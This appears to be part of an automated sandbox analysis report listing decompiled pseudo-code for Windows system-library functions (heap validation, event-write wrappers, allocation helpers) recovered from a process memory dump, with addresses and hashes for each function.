				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4c3d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04B67D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                    0x04c18f6a
                                                    0x04c18f79
                                                    0x04c18f81
                                                    0x04c18f84
                                                    0x04c18f8b
                                                    0x04c18f91
                                                    0x04c18f94
                                                    0x04c18f9e
                                                    0x04c18fb0
                                                    0x04c18fa0
                                                    0x04c18fa9
                                                    0x04c18fa9
                                                    0x04c18fbb
                                                    0x04c18fbc
                                                    0x04c18fbe
                                                    0x04c18fc3
                                                    0x04c18fd6

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 488dc88581fe9982ab8ea3d68743fe703acf8d94602d6bebf645615fa6cb0e57
                                                    • Instruction ID: e68d93bd3432d2ddbf3a420ba1540ab8d99ffe56e7aa19397c1cb756ea759faf
                                                    • Opcode Fuzzy Hash: 488dc88581fe9982ab8ea3d68743fe703acf8d94602d6bebf645615fa6cb0e57
                                                    • Instruction Fuzzy Hash: CC014474A0420CAFDB04EFB8D545AAEB7F4EF08704F104499F905EB390EA34EA00DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C0131B, Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E04C0131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4c3d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04B67D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                    0x04c0131b
                                                    0x04c0132a
                                                    0x04c01330
                                                    0x04c01336
                                                    0x04c0133e
                                                    0x04c01341
                                                    0x04c01344
                                                    0x04c0134f
                                                    0x04c01361
                                                    0x04c01351
                                                    0x04c0135a
                                                    0x04c0135a
                                                    0x04c0136c
                                                    0x04c0136d
                                                    0x04c0136f
                                                    0x04c01374
                                                    0x04c01387

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66233f42be02a9c1846ffd2bb220cdde62004b047beb7d1a0e337c6e5a4fc793
                                                    • Instruction ID: 452229196e11ed18d0fbe682c405e21e6f52b07b8d1f9d88d44e5c9890f8e390
                                                    • Opcode Fuzzy Hash: 66233f42be02a9c1846ffd2bb220cdde62004b047beb7d1a0e337c6e5a4fc793
                                                    • Instruction Fuzzy Hash: F3013171A01208AFDB04EFA9D545AAEB7F4FF08704F048099F845EB391EA34AA00CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C01608, Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E04C01608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x4c3d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04B67D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                    0x04c01608
                                                    0x04c01617
                                                    0x04c0161d
                                                    0x04c01625
                                                    0x04c01628
                                                    0x04c0162b
                                                    0x04c01636
                                                    0x04c01648
                                                    0x04c01638
                                                    0x04c01641
                                                    0x04c01641
                                                    0x04c01653
                                                    0x04c01654
                                                    0x04c01656
                                                    0x04c0165b
                                                    0x04c0166e

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9870e3b26c0f69018599121b97205e4d0b9625b3d5a438db1a08ce85d6c20418
                                                    • Instruction ID: 54ebeeb1f9006c28ab4f83e5af7d7f44c6ca785229e4540644974338bfcb9ac3
                                                    • Opcode Fuzzy Hash: 9870e3b26c0f69018599121b97205e4d0b9625b3d5a438db1a08ce85d6c20418
                                                    • Instruction Fuzzy Hash: 2CF06271E04248EFDB04EFA9D845AAEB7F4EF04304F044099F905EB391EA34A900CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B6C577, Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B6C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04B6C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4b211cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04C188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                    0x04b6c577
                                                    0x04b6c57d
                                                    0x04b6c581
                                                    0x04b6c5b5
                                                    0x04b6c5b9
                                                    0x04b6c5ce
                                                    0x04b6c5ce
                                                    0x04b6c5ca
                                                    0x00000000
                                                    0x04b6c5ca
                                                    0x04b6c5c4
                                                    0x04b6c5c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b6c5ad
                                                    0x00000000
                                                    0x04b6c5af

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4189e8ce80fa7748de49f07c36838767658f95166aef6fe1ec669fbd6ac65f48
                                                    • Instruction ID: fef52c8a8743877e1aa08d117bfaaa83e83b4edf41442351c74185bc50aaf9ab
                                                    • Opcode Fuzzy Hash: 4189e8ce80fa7748de49f07c36838767658f95166aef6fe1ec669fbd6ac65f48
                                                    • Instruction Fuzzy Hash: 3DF090B29156949EE7319B18C916B227FF6DB05774F4444EBD48787112C7ACF880CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C02073, Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E04C02073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04BFFD22(__ecx);
				_t19 =  *0x4c3849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4c38748; // 0x0
					if(__eflags <= 0) {
						E04C01C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4c38724 & 0x00000004;
							if(( *0x4c38724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4c38724; // 0x0
					return E04BF8DF1(__ebx, 0xc0000374, 0x4c35890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                    0x04c02076
                                                    0x04c02078
                                                    0x04c0207d
                                                    0x04c02083
                                                    0x04c020a4
                                                    0x04c020aa
                                                    0x04c020ac
                                                    0x04c020b7
                                                    0x04c020ba
                                                    0x04c020bc
                                                    0x04c020c9
                                                    0x04c020c9
                                                    0x04c020d0
                                                    0x04c020d2
                                                    0x00000000
                                                    0x04c020d2
                                                    0x04c020be
                                                    0x04c020c3
                                                    0x04c020c5
                                                    0x04c020c7
                                                    0x00000000
                                                    0x00000000
                                                    0x04c020c7
                                                    0x04c020bc
                                                    0x04c020d4
                                                    0x04c02085
                                                    0x04c02085
                                                    0x04c020a3
                                                    0x04c020a3

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: de4871f08e14dd25d5b06900f610d075e107fed8e7cab8e092ad1a59a2c79811
                                                    • Instruction ID: 3b41dda877d0c37a479662400502bf605b566b5be202a128c482d3c2822174e8
                                                    • Opcode Fuzzy Hash: de4871f08e14dd25d5b06900f610d075e107fed8e7cab8e092ad1a59a2c79811
                                                    • Instruction Fuzzy Hash: 9EF0207E4112844AEF327F2524083E12BC3CB4621DF0984C6F49017280CA38AE83DB21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C18D34, Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 43%
                                                    			E04C18D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4c3d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04B67D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                    0x04c18d34
                                                    0x04c18d43
                                                    0x04c18d4b
                                                    0x04c18d4e
                                                    0x04c18d52
                                                    0x04c18d5c
                                                    0x04c18d6e
                                                    0x04c18d5e
                                                    0x04c18d67
                                                    0x04c18d67
                                                    0x04c18d79
                                                    0x04c18d7a
                                                    0x04c18d7c
                                                    0x04c18d81
                                                    0x04c18d94

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5681a2ee667c0feaa1906b18bd0670032aa36f69af555f2387e81a981c64c463
                                                    • Instruction ID: 13c7271fc4e15c328223e68707ea3da5252c7a5f9b445af6fa54fd862ec6763b
                                                    • Opcode Fuzzy Hash: 5681a2ee667c0feaa1906b18bd0670032aa36f69af555f2387e81a981c64c463
                                                    • Instruction Fuzzy Hash: 26F09070A046089FDB04FFB8D441A6EB7B4EB04304F108099E906AB290EA38E900D754
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B8927A, Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E04B8927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E04B8FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E04B892C6(_t11, _t14);
				}
				return _t11;
			}





                                                    0x04b89295
                                                    0x04b89299
                                                    0x04b8929f
                                                    0x04b892aa
                                                    0x04b892ad
                                                    0x04b892ae
                                                    0x04b892af
                                                    0x04b892b0
                                                    0x04b892b4
                                                    0x04b892bb
                                                    0x04b892bb
                                                    0x04b892c5

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                    • Instruction ID: 90bce6bd8a0b70c5e0efb4adc612516fbc67b72d5767357a8435aa44057255c2
                                                    • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                    • Instruction Fuzzy Hash: B3E065722405406BEB11AF55DC84B577669EF82729F0440BDB5055E242C6F5E909C7A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C18CD6, Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 36%
                                                    			E04C18CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4c3d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04B67D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                    0x04c18ce5
                                                    0x04c18ced
                                                    0x04c18cf0
                                                    0x04c18cfb
                                                    0x04c18d0d
                                                    0x04c18cfd
                                                    0x04c18d06
                                                    0x04c18d06
                                                    0x04c18d18
                                                    0x04c18d19
                                                    0x04c18d1b
                                                    0x04c18d20
                                                    0x04c18d33

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2dea763f2250c8528bd57148654ae10cc92b8b6101fa000622b6a9c20b0d0a86
                                                    • Instruction ID: 34ea12e0d673b5fc5eeef79703c8acf7a9a0fc4b5b979712f2703329c1a4b0bf
                                                    • Opcode Fuzzy Hash: 2dea763f2250c8528bd57148654ae10cc92b8b6101fa000622b6a9c20b0d0a86
                                                    • Instruction Fuzzy Hash: 96F082B0A08609ABDB04FBB9D945EAE77B4EF09304F140199F916EB290EA38ED00D754
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B6746D, Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E04B6746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04B5EB70(__ecx, 0x4c379a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04B895D0();
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                    0x04b6746d
                                                    0x04b6746d
                                                    0x04b6746d
                                                    0x04b67471
                                                    0x04b67488
                                                    0x04baf92d
                                                    0x04b6748e
                                                    0x04b67491
                                                    0x04b67495
                                                    0x04baf937
                                                    0x04baf93a
                                                    0x04baf94e
                                                    0x04baf953
                                                    0x04baf956
                                                    0x04baf956
                                                    0x04b67495
                                                    0x00000000
                                                    0x04b67488
                                                    0x04b67473
                                                    0x04b67478
                                                    0x04b6747d
                                                    0x04b67481
                                                    0x00000000
                                                    0x04b67481
                                                    0x04b6747d
                                                    0x04b6747a
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53c8279455927d23b6122c0b6acfa2ee4013c7ddfe9a2b7703792ea833556d03
                                                    • Instruction ID: ca97e18db81d4fcbd5fc112e872fd77e166b30c0728d3ac24cf8b5e08c555dea
                                                    • Opcode Fuzzy Hash: 53c8279455927d23b6122c0b6acfa2ee4013c7ddfe9a2b7703792ea833556d03
                                                    • Instruction Fuzzy Hash: 94F05E34A15244AADF11AB7CC844BB9BBA1AF0475CF0446E9DC53AB160FB6DF801CB85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C18B58, Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 36%
                                                    			E04C18B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4c3d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04B67D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04B8B640(E04B89AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                    0x04c18b67
                                                    0x04c18b6f
                                                    0x04c18b72
                                                    0x04c18b7d
                                                    0x04c18b8f
                                                    0x04c18b7f
                                                    0x04c18b88
                                                    0x04c18b88
                                                    0x04c18b9a
                                                    0x04c18b9b
                                                    0x04c18b9d
                                                    0x04c18ba2
                                                    0x04c18bb5

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5a19b420bac4f95a16a956956eb130f65eb30efc2e4ebd28c29ab4be48cc718
                                                    • Instruction ID: 1481868a70bc2efc5b6f9db99078d2a2c53d46df13629da61fe3d8247e2d0ed6
                                                    • Opcode Fuzzy Hash: f5a19b420bac4f95a16a956956eb130f65eb30efc2e4ebd28c29ab4be48cc718
                                                    • Instruction Fuzzy Hash: F0F089B0A142589BEB04FBB4D945E7E73B4EF04304F440499B905DB390EA34E900D754
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B44F2E, Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B44F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04C188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04B6C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4b21030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                    0x04b44f2e
                                                    0x04b44f34
                                                    0x04b44f38
                                                    0x04ba0b85
                                                    0x04ba0b85
                                                    0x04ba0b89
                                                    0x04ba0b9a
                                                    0x04ba0b9a
                                                    0x04ba0b9f
                                                    0x00000000
                                                    0x04ba0b9f
                                                    0x04ba0b94
                                                    0x04ba0b98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba0b98
                                                    0x04b44f3e
                                                    0x04b44f48
                                                    0x00000000
                                                    0x04b44f6e
                                                    0x00000000
                                                    0x04b44f70

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 82bde34cccc8bdaae4eac1586aa7232d13cc5ae8b139c76778bc1aae0e8a0d53
                                                    • Instruction ID: 0e686661895475bacf951ec49f1c55cbc7320afd9ec7ea6e9ce9ddb997f13396
                                                    • Opcode Fuzzy Hash: 82bde34cccc8bdaae4eac1586aa7232d13cc5ae8b139c76778bc1aae0e8a0d53
                                                    • Instruction Fuzzy Hash: 9AF0E23292E6948FE771EF28C740B26B7E4EB087B8F8444E4D40587920C724FC5CC650
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7A44B, Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B7A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4c37b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E04B8FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                    0x04b7a44b
                                                    0x04b7a453
                                                    0x04b7a472
                                                    0x04b7a476
                                                    0x00000000
                                                    0x04b7a493
                                                    0x04b7a47a
                                                    0x04b7a47f
                                                    0x04b7a486
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88dd3388776ac224568dc53a56403875eb94edc148fe5fa12bd6ff546a93ba3c
                                                    • Instruction ID: 4d544947263fa87e6a5bbe94f515f59ba8f4be25d31c5e00e7a6fce5c2340e66
                                                    • Opcode Fuzzy Hash: 88dd3388776ac224568dc53a56403875eb94edc148fe5fa12bd6ff546a93ba3c
                                                    • Instruction Fuzzy Hash: 52E09272A41421ABD2115B58EC80F6B73ADEBD5755F0940B9E505C7210D639ED02C7E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B4F358, Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E04B4F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E04B7F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04B64620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                    0x04b4f35d
                                                    0x04b4f361
                                                    0x04b4f367
                                                    0x04b4f372
                                                    0x04b4f38c
                                                    0x04b4f38c
                                                    0x04b4f394

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                    • Instruction ID: f54549ff1b53a28cafe3462efef2fd158f16e3b27c5d2ef48e429b8330855076
                                                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                    • Instruction Fuzzy Hash: 40E0DF32A40118BBDF31AAD99E05FABBBACEB88B60F0101D6F904D7150D574AE00E6D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B5FF60, Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B5FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4b211a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04C188F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04B60050(_t14);
				}
			}










                                                    0x04b5ff66
                                                    0x04b5ff6b
                                                    0x00000000
                                                    0x04b5ff8f
                                                    0x00000000
                                                    0x04b5ff8f

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
